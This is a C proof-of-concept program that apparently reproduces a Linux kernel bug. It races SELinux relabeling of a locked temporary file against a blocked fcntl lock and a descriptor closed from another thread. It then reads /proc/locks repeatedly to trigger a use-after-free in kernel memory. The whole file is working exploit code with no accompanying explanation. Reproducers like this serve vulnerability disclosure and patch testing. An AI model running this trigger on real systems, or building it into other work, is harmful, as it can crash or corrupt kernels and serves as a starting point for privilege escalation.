// gcc -pthread -Wall -o selinux-file-lock selinux-file-lock.c && ./selinux-file-lock
#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <err.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <libgen.h>
#include <stdarg.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/xattr.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/signal.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "%s", "SYSCHK(" #x ")"); \
  __res;                      \
})

#define RESTRICTED_FILE_LABEL "unconfined_u:object_r:kmod_exec_t:s0"
#define LOCKABLE_FILE_LABEL "unconfined_u:object_r:modules_dep_t:s0"
#define UNLOCKABLE_FILE_LABEL "unconfined_u:object_r:ssh_home_t:s0"

char *get_context() {
  int fd = SYSCHK(open("/proc/self/attr/current", O_RDONLY));
  char *buf = malloc(1000);
  ssize_t len = SYSCHK(read(fd, buf, 1000-1));
  buf[len] = 0;
  close(fd);
  return buf;
}

/* temporary printf; returned pointer is valid until next tprintf */
__attribute__((format(printf, 1, 2)))
char *tprintf(char *fmt, ...) {
  static char buf[10000];
  va_list ap;
  va_start(ap, fmt);
  vsprintf(buf, fmt, ap);
  va_end(ap);
  return buf;
}

void *closer_thread_fn(void *arg) {
  sleep(1); // wait for step 1 to look up the fd

  // step 2: close the fd
  printf("closing fd\n");
  SYSCHK(close(100));
  return NULL;
}

int restricted_main(void) {
  int lockme = 100;
  printf("restricted context:   %s\n", get_context());

  // make sure we have the ability to lock the file
  struct flock flock_info_test = { .l_type = F_WRLCK, .l_whence = SEEK_SET, .l_start = 123, .l_len = 1 };
  SYSCHK(fcntl(lockme, F_SETLK, &flock_info_test));

  pthread_t thread;
  if (pthread_create(&thread, NULL, closer_thread_fn, NULL))
    errx(1, "pthread_create");

  // step 1: block on lock
  printf("blocking on lock...\n");
  struct flock flock_info = { .l_type = F_WRLCK, .l_whence = SEEK_SET, .l_start = 0, .l_len = 1337+1 };
  fcntl(lockme, F_SETLKW, &flock_info); // expected to fail with EBADF
  printf("resumed after block\n");

  return 0;
}

static void dump_locks(int locks) {
  char locks_buf[1000];
  ssize_t locks_len = SYSCHK(pread(locks, locks_buf, sizeof(locks_buf)-1, 0));
  locks_buf[locks_len] = '\0';
  printf("/proc/locks (the entry with '0 1337' is ours):\n%s\n", locks_buf);
}

int main(int argc, char **argv) {
  // common configuration
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  if (strcmp(argv[0], "RESTRICTED-CHILD") == 0)
    return restricted_main();

  printf("initial context:   %s\n", get_context());

  // make a temporary file with a copy of our executable
  char self_path[1000];
  self_path[SYSCHK(readlink("/proc/self/exe", self_path, sizeof(self_path)-1))] = 0;
  char *self_path_dir = strdup(dirname(self_path));
  int restricted_binary = SYSCHK(open(self_path_dir, O_TMPFILE|O_RDWR, 0700));
  int self_binary = SYSCHK(open("/proc/self/exe", O_RDONLY));
  struct stat bin_stat;
  SYSCHK(fstat(self_binary, &bin_stat));
  if (SYSCHK(copy_file_range(self_binary, NULL, restricted_binary, NULL, bin_stat.st_size, 0)) != bin_stat.st_size)
    errx(1, "copy_file_range incomplete");

  // relabel the temporary file
  SYSCHK(fsetxattr(restricted_binary, "security.selinux", RESTRICTED_FILE_LABEL, strlen(RESTRICTED_FILE_LABEL), 0));

  // avoid ETXTBSY: reopen the temporary file as read-only
  int restricted_binary_ro = SYSCHK(open(tprintf("/proc/self/fd/%d", restricted_binary), O_RDONLY));
  close(restricted_binary);

  // make another temporary file, this one is for getting locked and will be FD 100 in the child
  int lockme = SYSCHK(open(self_path_dir, O_TMPFILE|O_RDWR|O_CLOEXEC));
  SYSCHK(fsetxattr(lockme, "security.selinux", LOCKABLE_FILE_LABEL, strlen(LOCKABLE_FILE_LABEL), 0));

  // make lock busy
  struct flock flock_info = { .l_type = F_WRLCK, .l_whence = SEEK_SET, .l_start = 0, .l_len = 1 };
  SYSCHK(fcntl(lockme, F_SETLK, &flock_info));

  // open locks file
  int locks = SYSCHK(open("/proc/locks", O_RDONLY));

  pid_t child = SYSCHK(fork());
  if (child == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
    SYSCHK(dup2(lockme, 100));

    // exec-transition to restricted context
    char *restricted_args[] = { "RESTRICTED-CHILD", NULL };
    syscall(__NR_execveat, restricted_binary_ro, "", restricted_args, environ, AT_EMPTY_PATH);
    err(1, "execveat");
  }

  sleep(2); // wait for steps 1 and 2

  // step 3: relabel file to no longer be lockable
  printf("relabeling to unlockable\n");
  SYSCHK(fsetxattr(lockme, "security.selinux", UNLOCKABLE_FILE_LABEL, strlen(UNLOCKABLE_FILE_LABEL), 0));

  // step 4: unblock child by dropping our lock
  close(lockme);

  // step 5: wait for child to exit (which means file and inode are gone)
  int wstatus;
  SYSCHK(waitpid(child, &wstatus, 0));

  // step 6: repeatedly read locks (hopefully triggering UAF)
  while (1) {
    dump_locks(locks);

    sleep(1);
  }
  return 0;
}
